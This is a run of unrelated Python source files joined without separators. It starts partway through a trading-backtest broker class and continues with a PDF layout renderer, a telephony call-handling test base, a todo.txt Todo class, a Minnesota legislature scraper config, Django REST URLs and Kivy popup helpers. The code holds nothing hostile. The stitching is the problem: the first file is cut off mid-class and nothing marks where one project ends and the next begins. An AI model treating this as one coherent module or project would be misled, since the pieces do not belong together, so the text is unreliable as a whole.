        Falls back to the default scheme stored under ``None`` when no
        scheme was registered for the data's name.
        """
        if data._name in self.comminfo:
            return self.comminfo[data._name]

        return self.comminfo[None]

    def setcommission(self, commission=0.0, margin=None, mult=1.0, name=None):
        """Create and register a commission scheme keyed by data ``name``."""
        comm = CommissionInfo(commission=commission, margin=margin, mult=mult)
        self.comminfo[name] = comm

    def addcommissioninfo(self, comminfo, name=None):
        """Register a pre-built commission scheme keyed by data ``name``."""
        self.comminfo[name] = comminfo

    def start(self):
        self.init()

    def stop(self):
        pass

    def cancel(self, order):
        """Cancel a pending order.

        Returns True if the order was pending and is now cancelled and
        notified; False if it was not in the pending queue.
        """
        try:
            self.pending.remove(order)
        except ValueError:
            # If the queue didn't have the element we didn't cancel anything
            return False

        order.cancel()
        self.notify(order)
        return True

    def getvalue(self, datas=None):
        """Return total portfolio value: cash plus open position values.

        ``datas`` restricts the valuation to the given datas; by default
        every data with a recorded position is considered.
        """
        pos_value = 0.0
        for data in datas or self.positions.keys():
            comminfo = self.getcommissioninfo(data)
            position = self.positions[data]
            pos_value += comminfo.getvalue(position, data.close[0])

        return self.cash + pos_value

    def getposition(self, data):
        """Return the position for ``data`` (a fresh one if none exists)."""
        return self.positions[data]

    def submit(self, order):
        """Accept ``order``, queue it for execution and notify its owner."""
        # FIXME: When an order is submitted, a margin check
        # requirement has to be done before it can be accepted. This implies
        # going over the entire list of pending orders for all datas and
        # existing positions, simulating order execution and ending up
        # with a "cash" figure that can be used to check the margin requirement
        # of the order. If not met, the order can be immediately rejected
        order.pannotated = None
        order.plen = len(order.data)
        order.accept()
        self.orders.append(order)
        self.pending.append(order)
        self.notify(order)

        return order

    def buy(self, owner, data,
            size, price=None, plimit=None,
            exectype=None, valid=None):
        """Create and submit a BuyOrder for ``size`` units of ``data``."""
        order = BuyOrder(owner=owner, data=data,
                         size=size, price=price, pricelimit=plimit,
                         exectype=exectype, valid=valid)

        return self.submit(order)

    def sell(self, owner, data,
             size, price=None, plimit=None,
             exectype=None, valid=None):
        """Create and submit a SellOrder for ``size`` units of ``data``."""
        order = SellOrder(owner=owner, data=data,
                          size=size, price=price, pricelimit=plimit,
                          exectype=exectype, valid=valid)

        return self.submit(order)

    def _execute(self, order, dt, price):
        """Fully execute ``order`` at ``price``/``dt``.

        Updates the position, adjusts cash for closed/opened parts
        (operation cost, commission and future-like cash adjustments)
        and notifies the order with the execution details.
        """
        # Orders are fully executed, get operation size
        size = order.executed.remsize

        # Get comminfo object for the data
        comminfo = self.getcommissioninfo(order.data)

        # Adjust position with operation size
        position = self.positions[order.data]
        oldpprice = position.price

        psize, pprice, opened, closed = position.update(size, price)
        abopened, abclosed = abs(opened), abs(closed)

        # if part/all of a position has been closed, then there has been
        # a profitandloss ... record it
        pnl = comminfo.profitandloss(abclosed, oldpprice, price)

        if closed:
            # Adjust to returned value for closed items & acquired opened items
            closedvalue = comminfo.getoperationcost(abclosed, price)
            self.cash += closedvalue
            # Calculate and substract commission
            closedcomm = comminfo.getcomm_pricesize(abclosed, price)
            self.cash -= closedcomm
            # Re-adjust cash according to future-like movements
            # Restore cash which was already taken at the start of the day
            self.cash -= comminfo.cashadjust(abclosed,
                                             price,
                                             order.data.close[0])
        else:
            closedvalue = closedcomm = 0.0

        if opened:
            openedvalue = comminfo.getoperationcost(abopened, price)
            self.cash -= openedvalue

            openedcomm = comminfo.getcomm_pricesize(abopened, price)
            self.cash -= openedcomm

            # Remove cash for the new opened contracts
            self.cash += comminfo.cashadjust(abopened,
                                             price,
                                             order.data.close[0])
        else:
            openedvalue = openedcomm = 0.0

        # Execute and notify the order
        order.execute(dt, size, price,
                      closed, closedvalue, closedcomm,
                      opened, openedvalue, openedcomm,
                      comminfo.margin, pnl,
                      psize, pprice)

        self.notify(order)

    def notify(self, order):
        """Queue a clone of ``order`` for delivery to its owner."""
        self.notifs.append(order.clone())

    def next(self):
        """Process one bar: adjust future-like cash and try to execute
        every pending order once, re-queueing the ones still alive.
        """
        for data, pos in self.positions.items():
            # futures change cash in the broker in every bar
            # to ensure margin requirements are met
            comminfo = self.getcommissioninfo(data)
            self.cash += comminfo.cashadjust(pos.size,
                                             data.close[-1],
                                             data.close[0])

        # Iterate once over all elements of the pending queue
        for i in range(len(self.pending)):
            order = self.pending.popleft()

            if order.expire():
                self.notify(order)
                continue

            # Use tick prices when available, bar prices otherwise
            popen = order.data.tick_open or order.data.open[0]
            phigh = order.data.tick_high or order.data.high[0]
            plow = order.data.tick_low or order.data.low[0]
            pclose = order.data.tick_close or order.data.close[0]

            pcreated = order.created.price
            plimit = order.created.pricelimit

            if order.exectype == Order.Market:
                self._execute(order, order.data.datetime[0], price=popen)

            elif order.exectype == Order.Close:
                self._try_exec_close(order, pclose)

            elif order.exectype == Order.Limit:
                self._try_exec_limit(order, popen, phigh, plow, pcreated)

            # an already triggered StopLimit behaves like a plain Limit
            # order at the stored limit price (checked before the generic
            # StopLimit branch below on purpose)
            elif order.exectype == Order.StopLimit and order.triggered:
                self._try_exec_limit(order, popen, phigh, plow, plimit)

            elif order.exectype == Order.Stop:
                self._try_exec_stop(order, popen, phigh, plow, pcreated)

            elif order.exectype == Order.StopLimit:
                self._try_exec_stoplimit(order,
                                         popen, phigh, plow, pclose,
                                         pcreated, plimit)

            if order.alive():
                self.pending.append(order)

    def _try_exec_close(self, order, pclose):
        """Try to execute a Close order at the session end.

        Execution happens on the first bar past the end-of-session
        (``order.dteos``), at the price annotated on the previous bar if
        one exists, else at the current close.
        """
        if len(order.data) > order.plen:

            dt0 = order.data.datetime[0]

            if dt0 > order.dteos:
                if order.pannotated:
                    execdt = order.data.datetime[-1]
                    # BUGFIX: was ``execprice = pannotated`` — an undefined
                    # name (NameError); the annotated price is on the order
                    execprice = order.pannotated
                else:
                    execdt = dt0
                    execprice = pclose

                self._execute(order, execdt, price=execprice)

                return

        # If no execution has taken place ... annotate the closing price
        order.pannotated = pclose

    def _try_exec_limit(self, order, popen, phigh, plow, plimit):
        """Execute a Limit order if the bar reaches the limit price."""
        if order.isbuy():
            if plimit >= popen:
                # open smaller/equal than requested - buy cheaper
                self._execute(order, order.data.datetime[0], price=popen)
            elif plimit >= plow:
                # day low below req price ... match limit price
                self._execute(order, order.data.datetime[0], price=plimit)

        else:  # Sell
            if plimit <= popen:
                # open greater/equal than requested - sell more expensive
                self._execute(order, order.data.datetime[0], price=popen)
            elif plimit <= phigh:
                # day high above req price ... match limit price
                self._execute(order, order.data.datetime[0], price=plimit)

    def _try_exec_stop(self, order, popen, phigh, plow, pcreated):
        """Execute a Stop order if the bar penetrates the trigger price."""
        if order.isbuy():
            if popen >= pcreated:
                # price penetrated with an open gap - use open
                self._execute(order, order.data.datetime[0], price=popen)
            elif phigh >= pcreated:
                # price penetrated during the session - use trigger price
                self._execute(order, order.data.datetime[0], price=pcreated)

        else:  # Sell
            if popen <= pcreated:
                # price penetrated with an open gap - use open
                self._execute(order, order.data.datetime[0], price=popen)
            elif plow <= pcreated:
                # price penetrated during the session - use trigger price
                self._execute(order, order.data.datetime[0], price=pcreated)

    def _try_exec_stoplimit(self, order,
                            popen, phigh, plow, pclose,
                            pcreated, plimit):
        """Trigger a StopLimit order and, where the bar allows it,
        execute it within the same bar at the limit price rules.
        """
        if order.isbuy():
            if popen >= pcreated:
                order.triggered = True
                # price penetrated with an open gap
                if plimit >= popen:
                    self._execute(order, order.data.datetime[0], price=popen)
                elif plimit >= plow:
                    # execute in same bar
                    self._execute(order, order.data.datetime[0], price=plimit)

            elif phigh >= pcreated:
                # price penetrated upwards during the session
                order.triggered = True
                # can calculate execution for a few cases - datetime is fixed
                dt = order.data.datetime[0]
                if popen > pclose:
                    if plimit >= pcreated:
                        self._execute(order, dt, price=pcreated)
                    elif plimit >= pclose:
                        self._execute(order, dt, price=plimit)
                else:  # popen < pclose
                    if plimit >= pcreated:
                        self._execute(order, dt, price=pcreated)
        else:  # Sell
            if popen <= pcreated:
                # price penetrated downwards with an open gap
                order.triggered = True
                # BUGFIX: was ``plimit <= open`` — compared against the
                # builtin ``open`` instead of the bar's opening price
                if plimit <= popen:
                    self._execute(order, order.data.datetime[0], price=popen)
                elif plimit <= phigh:
                    # execute in same bar
                    self._execute(order, order.data.datetime[0], price=plimit)

            elif plow <= pcreated:
                # price penetrated downwards during the session
                order.triggered = True
                # can calculate execution for a few cases - datetime is fixed
                dt = order.data.datetime[0]
                if popen <= pclose:
                    if plimit <= pcreated:
                        self._execute(order, dt, price=pcreated)
                    elif plimit <= pclose:
                        self._execute(order, dt, price=plimit)
                else:
                    # popen > pclose
                    if plimit <= pcreated:
                        self._execute(order, dt, price=pcreated)

#! /usr/bin/env python

import logging, logtool
from .page import Page
from .xlate_frame import XlateFrame

LOG = logging.getLogger (__name__)

class Contents:
  """Renders a collection of drawable objects onto a single page."""

  @logtool.log_call
  def __init__ (self, canvas, objects):
    # Target canvas and the drawables to place on it.
    self.canvas = canvas
    self.objects = objects

  @logtool.log_call
  def render (self):
    """Draw each object at the position the page assigns to its asset."""
    with Page (self.canvas) as page:
      for item in self.objects:
        position = page.next (item.asset)
        frame = XlateFrame (self.canvas, item.tile_type, *position,
                            inset_by = "margin")
        with frame:
          item.render ()

# -*- coding: utf-8 -*-
import logging
from pprint     import pformat
from time       import clock, sleep

try:
    import unittest2 as unittest
except ImportError:
    import unittest

import config
from event_stack             import TimeOutReached
from database_reception      import Database_Reception
from static_agent_pools      import Receptionists, Customers

logging.basicConfig (level = logging.INFO)

class Test_Case (unittest.TestCase):
    """Base test case for incoming-call scenarios.

    Drives a caller, two receptionists and a callee agent (allocated from
    the static agent pools) against a selected reception through
    Call-Flow-Control, with numbered step logging throughout.
    """

    # Agents allocated in Preconditions and released in Postprocessing.
    Caller             = None
    Receptionist       = None
    Receptionist_2     = None
    Callee             = None

    # Connection to the reception database server.
    Reception_Database = None

    # The reception under test.
    Reception          = None

    # Wall-clock reference and 1-based number of the next test step.
    Start_Time         = None
    Next_Step          = 1

    def Preconditions (self, Reception):
        """Allocate all agents and select the reception (and its database
        connection) that the test will run against.
        """
        self.Start_Time = clock ()
        self.Next_Step  = 1

        self.Log ("Incoming calls test case: Setting up preconditions...")

        self.Log ("Requesting a customer (caller)...")
        self.Caller = Customers.request ()

        self.Log ("Requesting a receptionist...")
        self.Receptionist = Receptionists.request ()

        self.Log ("Requesting a second receptionist...")
        self.Receptionist_2 = Receptionists.request ()

        self.Log ("Requesting a customer (callee)...")
        self.Callee = Customers.request ()

        self.Log ("Select which reception to test...")
        self.Reception    = Reception

        self.Log ("Select a reception database connection...")
        self.Reception_Database = Database_Reception (uri       = config.reception_server_uri,
                                                      authtoken = self.Receptionist.call_control.authtoken)


    def Postprocessing (self):
        """Release every agent that was actually allocated."""
        self.Log ("Incoming calls test case: Cleaning up after test...")

        if not self.Caller is None:
            self.Caller.release ()
        if not self.Receptionist is None:
            self.Receptionist.release ()
        if not self.Receptionist_2 is None:
            self.Receptionist_2.release ()
        if not self.Callee is None:
            self.Callee.release ()

    def Step (self,
              Message,
              Delay_In_Seconds = 0.0):
        """Log a numbered test step, optionally sleeping afterwards, and
        advance the step counter.
        """
        # Re-initialise counters if the test skipped Preconditions.
        if self.Next_Step is None:
            self.Next_Step = 1
        if self.Start_Time is None:
            self.Start_Time = clock ()

        logging.info ("Step " + str (self.Next_Step) + ": " + Message)
        sleep (Delay_In_Seconds)
        self.Next_Step += 1

    def Log (self,
             Message,
             Delay_In_Seconds = 0.0):
        """Log a sub-step message under the current step number (does not
        advance the counter), optionally sleeping afterwards.
        """
        if self.Next_Step is None:
            self.Next_Step = 1
        if self.Start_Time is None:
            self.Start_Time = clock ()

        logging.info ("     " + str (self.Next_Step - 1) + ": " + Message)
        sleep (Delay_In_Seconds)

    def Caller_Places_Call (self, Number):
        """Have the caller agent dial the given number."""
        self.Step (Message = "Caller places call to " + str (Number) + "...")

        self.Log (Message = "Dialling through caller agent...")
        self.Caller.dial (Number)

    def Receptionist_Places_Call (self, Number):
        """Have the receptionist agent dial the given number."""
        self.Step (Message = "Receptionist places call to " + str (Number) + "...")

        self.Log (Message = "Dialling through receptionist agent...")
        self.Receptionist.dial (Number)

    def Caller_Hears_Dialtone (self):
        """Block until the caller's SIP phone reports a dial-tone."""
        self.Step (Message = "Caller hears dial-tone...")

        self.Log (Message = "Caller agent waits for dial-tone...")
        self.Caller.sip_phone.Wait_For_Dialtone ()

    def Receptionist_Hears_Dialtone (self):
        """Block until the receptionist's SIP phone reports a dial-tone."""
        self.Step (Message = "Receptionist hears dial-tone...")

        self.Log (Message = "Receptionist agent waits for dial-tone...")
        self.Receptionist.sip_phone.Wait_For_Dialtone ()

    def Call_Announced (self):
        """Wait for a 'call_offer' event for the tested reception.

        Fails the test on timeout or if the offer targets another
        reception. Returns (call id, reception id) from the event.
        """
        self.Step (Message = "Receptionist's client waits for 'call_offer'...")

        try:
            self.Receptionist.event_stack.WaitFor ("call_offer")
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("Call offer didn't arrive from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type="call_offer",
                                                             destination=self.Reception):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived call offer was not for the expected reception (destination).")

        return self.Receptionist.event_stack.Get_Latest_Event (Event_Type="call_offer", Destination=self.Reception)['call']['id'],\
               self.Receptionist.event_stack.Get_Latest_Event (Event_Type="call_offer", Destination=self.Reception)['call']['reception_id']

    def Call_Announced_As_Locked (self, Call_ID):
        """Wait for a 'call_lock' event for the given call; fail the test
        on timeout or if the event targets another reception.
        """
        self.Step (Message = "Call-Flow-Control sends out 'call_lock'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_lock",
                                                   call_id    = Call_ID,
                                                   timeout    = 20.0)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_lock' event arrived from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type  = "call_lock",
                                                             destination = self.Reception,
                                                             call_id     = Call_ID):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived 'call_lock' event was not for the expected reception (destination).")

    def Call_Announced_As_Unlocked (self, Call_ID):
        """Wait for a 'call_unlock' event for the given call; fail the
        test on timeout or if the event targets another reception.
        """
        self.Step (Message = "Call-Flow-Control sends out 'call_unlock'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_unlock",
                                                   call_id    = Call_ID)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_unlock' event arrived from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type  = "call_unlock",
                                                             destination = self.Reception,
                                                             call_id     = Call_ID):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived 'call_unlock' event was not for the expected reception (destination).")

    def Request_Information (self, Reception_ID):
        """Fetch and return the database record for the given reception."""
        self.Step (Message = "Requesting (updated) information about reception " + str (Reception_ID))

        Data_On_Reception = self.Reception_Database.Single (Reception_ID)

        self.Step (Message = "Received information on reception " + str (Reception_ID))

        return Data_On_Reception

    def Offer_To_Pick_Up_Call (self, Call_Flow_Control, Call_ID):
        """Offer to answer the call; errors are logged, not raised."""
        self.Step (Message = "Client offers to answer call...")

        try:
            Call_Flow_Control.PickupCall (call_id = Call_ID)
        except:
            # NOTE(review): bare except — any pick-up failure is treated as
            # best-effort and only logged; confirm this is intentional.
            self.Log (Message = "Pick-up call returned an error of some kind.")

    def Call_Allocation_Acknowledgement (self, Call_ID, Receptionist_ID):
        """Wait for a 'call_pickup' event for the given call and verify it
        was assigned to the expected receptionist. Returns the event.
        """
        self.Step (Message = "Receptionist's client waits for 'call_pickup'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_pickup",
                                                   call_id    = Call_ID)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_pickup' event arrived from Call-Flow-Control.")

        try:
            Event = self.Receptionist.event_stack.Get_Latest_Event (Event_Type = "call_pickup",
                                                                    Call_ID    = Call_ID)
        except:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("Could not extract the received 'call_pickup' event from the Call-Flow-Control client.")

        try:
            if not Event['call']['assigned_to'] == Receptionist_ID:
                logging.critical (self.Receptionist.event_stack.dump_stack ())
                self.fail ("The arrived 'call_pickup' event was for " + str (Event['call']['assigned_to']) + ", and not for " + str (Receptionist_ID) + " as expected.")
        except:
            # Dump the stack for diagnosis, then let the failure propagate.
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            raise

        self.Log (Message = "Call picked up: " + pformat (Event))

        return Event

    def Receptionist_Answers (self, Call_Information, Reception_Information, After_Greeting_Played):
        """Simulate the receptionist answering with the appropriate
        greeting and verify the timing relative to the recorded message.
        """
        self.Step (Message = "Receptionist answers...")

        # Short greeting if the caller already heard the recording,
        # full greeting otherwise.
        if Call_Information['call']['greeting_played']:
            try:
                self.Log (Message = "Receptionist says '" + Reception_Information['short_greeting'] + "'.")
            except:
                self.fail ("Reception information missing 'short_greeting'.")
        else:
            try:
                self.Log (Message = "Receptionist says '" + Reception_Information['greeting'] + "'.")
            except:
                self.fail ("Reception information missing 'greeting'.")

        if After_Greeting_Played:
            if not Call_Information['call']['greeting_played']:
                self.fail ("It appears that the receptionist didn't wait long enough to allow the caller to hear the recorded message.")
        else:
            if Call_Information['call']['greeting_played']:
                self.fail ("It appears that the receptionist waited too long, and allowed the caller to hear the recorded message.")

# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topydo.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
This module provides the Todo class.
"""

from datetime import date

from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date


class Todo(TodoBase):
    """
    A todo item with date awareness.

    Extends the Todo base class with start/due date handling: activity,
    overdue status and task length are all derived from those dates.
    """

    def __init__(self, p_str):
        TodoBase.__init__(self, p_str)
        self.attributes = {}

    def get_date(self, p_tag):
        """ Given a date tag, return a date object. """
        raw = self.tag_value(p_tag)

        if not raw:
            return None

        try:
            return date_string_to_date(raw)
        except ValueError:
            # Malformed date value: treat as absent.
            return None

    def start_date(self):
        """ Returns a date object of the todo's start date. """
        return self.get_date(config().tag_start())

    def due_date(self):
        """ Returns a date object of the todo's due date. """
        return self.get_date(config().tag_due())

    def is_active(self):
        """
        Returns True when the start date is today or in the past and the
        task has not yet been completed.
        """
        if self.is_completed():
            return False

        start = self.start_date()
        return start is None or start <= date.today()

    def is_overdue(self):
        """
        Returns True when the due date is in the past and the task has not
        yet been completed.
        """
        return self.days_till_due() < 0 and not self.is_completed()

    def days_till_due(self):
        """
        Returns the number of days till the due date. Returns a negative
        number of days when the due date is in the past.
        Returns 0 when the task has no due date.
        """
        due = self.due_date()

        if due is None:
            return 0

        return (due - date.today()).days

    def length(self):
        """
        Returns the length (in days) of the task, by considering the start
        date and the due date. When there is no start date, its creation
        date is used. Returns 0 when one of these dates is missing.
        """
        begin = self.start_date() or self.creation_date()
        end = self.due_date()

        if begin and end and begin < end:
            return (end - begin).days

        return 0

from pupa.scrape import Jurisdiction, Organization
from .bills import MNBillScraper
from .committees import MNCommitteeScraper
from .people import MNPersonScraper
from .vote_events import MNVoteScraper
from .events import MNEventScraper
from .common import url_xpath

"""
Minnesota legislative data can be found at the Office of the Revisor
of Statutes:
https://www.revisor.mn.gov/

Votes:
There is no detailed vote data for Senate votes, only yes and no counts.
Bill pages have vote counts and links to House details, so it makes more
sense to get vote data from the bill pages.
"""


class Minnesota(Jurisdiction):
    """Pupa jurisdiction definition for the Minnesota Legislature."""

    division_id = "ocd-division/country:us/state:mn"
    classification = "government"
    name = "Minnesota"
    url = "http://state.mn.us/"
    check_sessions = True
    # Scraper classes keyed by the data type they produce.
    scrapers = {
        "bills": MNBillScraper,
        "committees": MNCommitteeScraper,
        "people": MNPersonScraper,
        "vote_events": MNVoteScraper,
        "events": MNEventScraper,
    }
    parties = [{'name': 'Republican'},
               {'name': 'Democratic-Farmer-Labor'}]
    # Sessions to scrape; '_scraped_name' must match the option text on the
    # Revisor site (see get_session_list).
    legislative_sessions = [
        {
            '_scraped_name': '86th Legislature, 2009-2010',
            'classification': 'primary',
            'identifier': '2009-2010',
            'name': '2009-2010 Regular Session'
        },
        {
            '_scraped_name': '86th Legislature, 2010 1st Special Session',
            'classification': 'special',
            'identifier': '2010 1st Special Session',
            'name': '2010, 1st Special Session'
        },
        {
            '_scraped_name': '86th Legislature, 2010 2nd Special Session',
            'classification': 'special',
            'identifier': '2010 2nd Special Session',
            'name': '2010, 2nd Special Session'
        },
        {
            '_scraped_name': '87th Legislature, 2011-2012',
            'classification': 'primary',
            'identifier': '2011-2012',
            'name': '2011-2012 Regular Session'
        },
        {
            '_scraped_name': '87th Legislature, 2011 1st Special Session',
            'classification': 'special',
            'identifier': '2011s1',
            'name': '2011, 1st Special Session'
        },
        {
            '_scraped_name': '87th Legislature, 2012 1st Special Session',
            'classification': 'special',
            'identifier': '2012s1',
            'name': '2012, 1st Special Session'
        },
        {
            '_scraped_name': '88th Legislature, 2013-2014',
            'classification': 'primary',
            'identifier': '2013-2014',
            'name': '2013-2014 Regular Session'
        },
        {
            '_scraped_name': '88th Legislature, 2013 1st Special Session',
            'classification': 'special',
            'identifier': '2013s1',
            'name': '2013, 1st Special Session'
        },
        {
            '_scraped_name': '89th Legislature, 2015-2016',
            'classification': 'primary',
            'identifier': '2015-2016',
            'name': '2015-2016 Regular Session'
        },
        {
            '_scraped_name': '89th Legislature, 2015 1st Special Session',
            'classification': 'special',
            'identifier': '2015s1',
            'name': '2015, 1st Special Session'
        },
        {
            '_scraped_name': '90th Legislature, 2017-2018',
            'classification': 'primary',
            'identifier': '2017-2018',
            'name': '2017-2018 Regular Session'
        },
    ]
    # Session names the site lists but that should not be scraped.
    ignored_scraped_sessions = [
        '85th Legislature, 2007-2008',
        '85th Legislature, 2007 1st Special Session',
        '84th Legislature, 2005-2006',
        '84th Legislature, 2005 1st Special Session',
        '83rd Legislature, 2003-2004',
        '83rd Legislature, 2003 1st Special Session',
        '82nd Legislature, 2001-2002',
        '82nd Legislature, 2002 1st Special Session',
        '82nd Legislature, 2001 1st Special Session',
        '81st Legislature, 1999-2000',
        '80th Legislature, 1997-1998',
        '80th Legislature, 1998 1st Special Session',
        '80th Legislature, 1997 3rd Special Session',
        '80th Legislature, 1997 2nd Special Session',
        '80th Legislature, 1997 1st Special Session',
        '79th Legislature, 1995-1996',
        '79th Legislature, 1995 1st Special Session',
        # NOTE(review): this entry also appears in legislative_sessions
        # above — confirm it is intentionally both scraped and ignored.
        '89th Legislature, 2015-2016',
    ]

    def get_organizations(self):
        """Yield the legislature and its two chambers, with one Senate
        post and two House posts (A/B) per district 1-67.
        """
        legis = Organization('Minnesota Legislature', classification='legislature')

        upper = Organization('Minnesota Senate', classification='upper',
                             parent_id=legis._id)
        lower = Organization('Minnesota House of Representatives',
                             classification='lower', parent_id=legis._id)

        for n in range(1, 68):
            upper.add_post(label=str(n), role='Senator',
                           division_id='ocd-division/country:us/state:mn/sldu:{}'.format(n))
            lower.add_post(label=str(n) + 'A', role='Representative',
                           division_id='ocd-division/country:us/state:mn/sldl:{}a'.format(n))
            lower.add_post(label=str(n) + 'B', role='Representative',
                           division_id='ocd-division/country:us/state:mn/sldl:{}b'.format(n))

        yield legis
        yield upper
        yield lower

    def get_session_list(self):
        """Scrape the available session names from the Revisor
        status-search page's session dropdown.
        """
        return url_xpath('https://www.revisor.mn.gov/revisor/pages/'
                         'search_status/status_search.php?body=House',
                         '//select[@name="session"]/option/text()')

'''
Copyright 2015

This file is part of Orbach.

Orbach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

Orbach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Orbach.  If not, see <http://www.gnu.org/licenses/>.
'''
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter

from orbach.core import views

# DRF router: generates list/detail routes for each registered viewset.
router = DefaultRouter()
router.register(r'galleries', views.GalleryViewSet)
router.register(r'image_files', views.ImageFileViewSet)
router.register(r'users', views.UserViewSet)

# Serve every router-generated endpoint from the root of this URL namespace.
urlpatterns = [
    url(r'^', include(router.urls)),
]

import kivy
kivy.require('1.9.1')
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.metrics import dp
from kivy.app import Builder
from kivy.properties import StringProperty, ObjectProperty
from kivy.clock import Clock
from kivy.metrics import sp
from kivy.metrics import dp
from iconbutton import IconButton

# Fixed: the original was a single string ('alertPopup, confirmPopup, ...')
# wrapped in parentheses, not a tuple, so `from ... import *` exported a
# bogus one-element API. Each name is now its own string.
__all__ = ('alertPopup', 'confirmPopup', 'okPopup', 'editor_popup')

# Kv rules for the popup body widgets defined below. Each rule builds a
# GridLayout body whose icon buttons dispatch an 'on_answer' event with
# True (confirm) or False (cancel).
# NOTE(review): the <OkPopup> rule dispatches 'on_answer', but the OkPopup
# class registers/binds 'on_ok' only — confirm whether the kv rule should
# dispatch 'on_ok' instead.
Builder.load_string('''
<ConfirmPopup>:
    cols:1
    Label:
        text: root.text
    GridLayout:
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
        IconButton:
            text: u'\uf00d'
            color: ColorScheme.get_primary()            
            on_release: root.dispatch('on_answer', False)
            
<OkPopup>:
    cols:1
    Label:
        text: root.text
    GridLayout:
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
            
            
<EditorPopup>:
    id: editor_popup
    cols:1
    BoxLayout:
        id: content
    GridLayout:
        id: buttons
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
        IconButton:
            text: u'\uf00d'
            color: ColorScheme.get_primary()            
            on_release: root.dispatch('on_answer', False)
            
''')
 
def alertPopup(title, msg):
    """Show a simple modal alert popup containing `msg`.

    :param title: popup window title.
    :param msg: message text shown in the body.
    :returns: the opened Popup, so callers can dismiss it — consistent
        with confirmPopup/okPopup/editor_popup (backward compatible:
        previous callers ignored the implicit None return).
    """
    popup = Popup(title=title,
                  content=Label(text=msg),
                  size_hint=(None, None), size=(dp(600), dp(200)))
    popup.open()
    return popup
 
def confirmPopup(title, msg, answerCallback):
    """Show a modal yes/no popup; `answerCallback` receives the answer.

    :returns: the opened Popup so the caller can dismiss it.
    """
    body = ConfirmPopup(text=msg)
    body.bind(on_answer=answerCallback)
    dialog = Popup(title=title,
                   content=body,
                   size_hint=(None, None),
                   size=(dp(600), dp(200)),
                   auto_dismiss=False)
    dialog.open()
    return dialog
    
class ConfirmPopup(GridLayout):
    """Popup body (layout defined in kv) that fires 'on_answer' with the
    user's yes/no choice."""

    # Message displayed in the popup body.
    text = StringProperty()

    def __init__(self, **kwargs):
        # Register the custom event before the kv rules attach handlers.
        self.register_event_type('on_answer')
        super(ConfirmPopup, self).__init__(**kwargs)

    def on_answer(self, *args):
        """Default no-op handler; real handling is attached via bind()."""

def editor_popup(title, content, answerCallback):
    """Show a modal editor popup wrapping `content`.

    :param content: widget placed inside the EditorPopup body.
    :returns: the opened Popup so the caller can dismiss it.
    """
    body = EditorPopup(content=content)
    body.bind(on_answer=answerCallback)
    dialog = Popup(title=title,
                   content=body,
                   size_hint=(0.7, 0.8),
                   auto_dismiss=False,
                   title_size=sp(18))
    dialog.open()
    return dialog
    
class EditorPopup(GridLayout):
    """Popup body with a pluggable content widget; fires 'on_answer'."""

    # Widget injected into the kv 'content' BoxLayout.
    content = ObjectProperty(None)

    def __init__(self, **kwargs):
        # Register the custom event before the kv rules attach handlers.
        self.register_event_type('on_answer')
        super(EditorPopup, self).__init__(**kwargs)

    def on_content(self, instance, value):
        # Defer one frame so self.ids is populated before adding the widget.
        Clock.schedule_once(lambda dt: self.ids.content.add_widget(value))

    def on_answer(self, *args):
        """Default no-op handler; real handling is attached via bind()."""

def okPopup(title, msg, answerCallback):
    """Show a modal OK popup; `answerCallback` is bound to 'on_ok'.

    :returns: the opened Popup so the caller can dismiss it.
    """
    body = OkPopup(text=msg)
    body.bind(on_ok=answerCallback)
    dialog = Popup(title=title,
                   content=body,
                   size_hint=(None, None),
                   size=(dp(600), dp(200)),
                   auto_dismiss=False)
    dialog.open()
    return dialog
    
class OkPopup(GridLayout):
    """Popup body (layout defined in kv) that fires 'on_ok'.

    NOTE(review): the kv rule for <OkPopup> dispatches 'on_answer', which
    is not registered on this class — confirm whether the kv rule should
    dispatch 'on_ok' instead.
    """

    # Message displayed in the popup body.
    text = StringProperty()

    def __init__(self, **kwargs):
        # Register the custom event before the kv rules attach handlers.
        self.register_event_type('on_ok')
        super(OkPopup, self).__init__(**kwargs)

